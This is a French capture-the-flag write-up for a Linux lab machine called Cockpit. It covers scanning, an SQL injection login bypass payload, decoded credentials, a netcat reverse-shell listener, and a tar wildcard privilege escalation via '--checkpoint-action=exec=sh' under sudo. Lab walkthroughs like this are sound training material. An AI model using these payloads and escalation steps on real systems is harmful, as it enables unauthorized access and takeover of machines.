Cockpit

SQLi Auth bypass Wildcard tar

Nom machine : Cockpit
Difficulté : Intermédiaire
OS : Linux

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-09 09:25 EDT
Nmap scan report for 192.168.242.10
Host is up (0.033s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp   open  http            Apache httpd 2.4.41 ((Ubuntu))
|_http-title: blaze
|_http-server-header: Apache/2.4.41 (Ubuntu)
9090/tcp open  ssl/zeus-admin?
| ssl-cert: Subject: commonName=blaze/organizationName=d2737565435f491e97f49bb5b34ba02e
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Not valid before: 2024-08-09T13:25:32
|_Not valid after:  2124-07-16T13:25:32
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|     margin: 0 0 10px;
|_    @font-face {
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.94SVN%T=SSL%I=7%D=8/9%Time=66B61933%P=x86_64-pc-linux-
SF:gnu%r(GetRequest,E45,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Typ
SF:e:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-
SF:DNS-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Co
SF:ntent-Type-Options:\x20nosniff\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\
SF:n<head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</tit
SF:le>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"
SF:text/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewpor
SF:t\"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20
SF:\x20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20f
SF:ont-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x2
SF:0Arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0font-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20l
SF:ine-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20margin:\x200\x200\x2010px;\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20@font-face\x20{\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20")%r(HTTPOptions,E45,"HTTP/1\.1\x20400\x20B
SF:ad\x20request\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfe
SF:r-Encoding:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Po
SF:licy:\x20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\n\r\n29\r\
SF:n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x20<title>\r\nb\r\nBa
SF:d\x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<meta\x20http-equiv=\"
SF:Content-Type\"\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20\x2
SF:0\x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20ini
SF:tial-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\x20{\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatDisplay\",\x20\"Open
SF:\x20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20line-height:\x201\.66666667;\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#f5f5f5;\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:\x200;\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:\x20middle;\n\x20\x
SF:20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-weight:\x20300;\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200\x200\x20
SF:10px;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20@font-face\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

Nous tombons sur une page web.

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.242.10/ 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.242.10/__24-08-09_09-26-26.txt

Target: http://192.168.242.10/

[09:26:26] Starting: 
[09:26:29] 403 -  279B  - /.ht_wsr.txt
[09:26:29] 403 -  279B  - /.htaccess.bak1
[09:26:29] 403 -  279B  - /.htaccess.sample
[09:26:29] 403 -  279B  - /.htaccess.orig
[09:26:29] 403 -  279B  - /.htaccess.save
[09:26:29] 403 -  279B  - /.htaccess_sc
[09:26:29] 403 -  279B  - /.htaccess_extra
[09:26:29] 403 -  279B  - /.htaccessBAK
[09:26:29] 403 -  279B  - /.htaccessOLD
[09:26:29] 403 -  279B  - /.htaccess_orig
[09:26:29] 403 -  279B  - /.htaccessOLD2
[09:26:29] 403 -  279B  - /.htm
[09:26:29] 403 -  279B  - /.html
[09:26:29] 403 -  279B  - /.htpasswd_test
[09:26:29] 403 -  279B  - /.htpasswds
[09:26:29] 403 -  279B  - /.httr-oauth
[09:26:30] 301 -  313B  - /js  ->  http://192.168.242.10/js/
[09:26:31] 403 -  279B  - /.php
[09:26:42] 301 -  314B  - /css  ->  http://192.168.242.10/css/
[09:26:46] 301 -  314B  - /img  ->  http://192.168.242.10/img/
[09:26:47] 200 -  455B  - /js/
[09:26:47] 200 -  379B  - /login.php
[09:26:48] 302 -    0B  - /logout.php  ->  login.php
[09:26:57] 403 -  279B  - /server-status
[09:26:57] 403 -  279B  - /server-status/

Nous avons essayé de bruteforce la page avec des listes courtes et burp suite mais sans succès.

Zeus-admin (9090)

Nous avons essayer plusieurs combinaison de nom d'utilisateur et de mot de passe : sans succès. Nous avons tenté ensuite de cliquer sur "Other Options", et avons rentré admin@localhost. Nous avons un résultat et peu importe les crédentials utilisés.

Qui n'abouti à rien... Ce qui est assez normal car on essaie de se connecter en ssh.

Nous allons retourner sur la page au port 80.

Accès initial

Après recherche, nous trouvons un exploit pour Blaze

┌──(kali㉿kali)-[~]
└─$ searchsploit blaze
---------------------------------------------------------- ---------------------------------
 Exploit Title                                            |  Path
---------------------------------------------------------- ---------------------------------
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Des | windows/remote/43993.py
Blaze Apps - Multiple Vulnerabilities                     | asp/webapps/12734.txt
Blaze Apps 1.x - SQL Injection / HTML Injection           | multiple/webapps/33995.txt
Blaze HDTV Player 6.0 - '.plf' Local Buffer Overflow (SEH | windows/local/9346.pl
BlazeBoard 1.0 - Information Disclosure                   | php/webapps/22901.txt
BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflo | windows/remote/6217.pl
BlazeDVD 5.1 (Windows 7) - '.plf' File Stack Buffer Overf | windows/local/13905.py
BlazeDVD 5.1 - PLF Buffer Overflow (Metasploit)           | windows/local/16618.rb
BlazeDVD 5.1 Professional - '.plf' Local Buffer Overflow  | windows/local/9329.pl
BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Ov | windows/local/9360.pl
BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH | windows/local/13998.pl
BlazeDVD 6.0 - Local Buffer Overflow (Metasploit)         | windows/local/14077.rb
BlazeDVD 6.1 - '.PLF' File (ASLR + DEP Bypass) (Metasploi | windows/local/23783.rb
BlazeDVD 6.2 - '.plf' Local Buffer Overflow (SEH)         | windows/local/29263.pl
BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow  | windows/local/48776.py
BlazeDVD 7.0.2 - Buffer Overflow (SEH)                    | windows/local/48329.py
BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer O | windows/local/26889.pl
BlazeDVD Pro Player 6.1 - Stack Buffer Overflow Jump ESP  | windows/local/32737.pl
BlazeDVD Pro Player 7.0 - '.plf' Direct RET Local Stack B | windows/local/34331.py
BlazeDVD Pro Player 7.0 - '.plf' Local Buffer Overflow (S | windows/local/34371.py
BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow | windows/local/2880.c
BlazeVideo HDTV Player 3.5 - '.PLF' File Stack Buffer Ove | windows/remote/32129.cpp
BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local O | windows/local/7975.py
BlazeVideo HDTV Player 6.6 Professional - Direct RETN     | windows/local/22931.py
BlazeVideo HDTV Player 6.6 Professional - Local Overflow  | windows/local/18693.py
BlazeVideo HDTV Player 6.6 Professional - Universal ASLR  | windows/local/17939.py
BlazeVideo HDTV Player Pro 6.6 - Filename Handling (Metas | windows/local/23052.rb
BlazeVideo HDTV Player Standard - '.plf' File Remote Buff | windows/remote/38394.py
MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabil | hardware/webapps/34128.py
Outblaze Webmail - Cookie Authentication Bypass           | cgi/webapps/22364.c
Outblaze Webmail - HTML Injection                         | php/webapps/24291.txt
Pendulab ChatBlazer 8.5 - 'Username' Cross-Site Scripting | php/webapps/37095.txt
---------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                           
┌──(kali㉿kali)-[~]
└─$ searchsploit -m multiple/webapps/33995.txt
  Exploit: Blaze Apps 1.x - SQL Injection / HTML Injection
      URL: https://www.exploit-db.com/exploits/33995
     Path: /usr/share/exploitdb/exploits/multiple/webapps/33995.txt
    Codes: N/A
 Verified: True
File Type: HTML document, ASCII text
Copied to: /home/kali/33995.txt

┌──(kali㉿kali)-[~]
└─$ cat /home/kali/33995.txt      
source: https://www.securityfocus.com/bid/40212/info

Blaze Apps is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker may exploit the HTML-injection issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is displayed, and launch other attacks.

The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Blaze Apps 1.4.0.051909 and prior are vulnerable.

HTML Injection

<script>alert('Stored XSS')</script>

SQL Injection

aa' OR [SQL] OR 'a'='1

Nous allons tenter une injection SQL

Oups, nous sommes bloqués. Quand nous essayons d'autre caractères spéciaux, un message d'erreur SQL apparaît. Nous allons tester avec une liste de payloads permettant de bypasser l'authentification.

Page not found - HackTricksbook.hacktricks.xyz

Nous allons utiliser : ' or''='

┌──(kali㉿kali)-[~]
└─$ echo 'Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=' | base64 -d
canttouchhhthiss@455152                                                                                                
┌──(kali㉿kali)-[~]
└─$ echo 'dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy' | base64 -d
thisscanttbetouchedd@455152

Nous avons maintenant deux utilisateurs et deux mots de passe. Revenons sur le port 9090.

Rentrons les crédentials de james. Bingo !

En fouillant un peu la page, on trouve un terminal...

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234         
listening on [any] 1234 ...
connect to [192.168.45.199] from (UNKNOWN) [192.168.242.10] 54688
james@blaze:~$ whoami
whoami
james

Elévation des privilèges

james@blaze:~$ sudo -l
sudo -l
Matching Defaults entries for james on blaze:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on blaze:
    (ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *

tar | GTFOBinsgtfobins.github.io

Privilège escalation très connu, abuser des wildcard...

james@blaze:/tmp$ echo "" > --checkpoint=1
echo "" > --checkpoint=1
james@blaze:/tmp$ echo "" > --checkpoint-action=exec=sh
echo "" > --checkpoint-action=exec=sh
james@blaze:/tmp$ sudo /usr/bin/tar -czvf /tmp/backup.tar.gz *

Nous sommes root !

PrécédentCrane SuivantEscape

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagHTTP (80)

hashtagZeus-admin (9090)

hashtagAccès initial

hashtagElévation des privilèges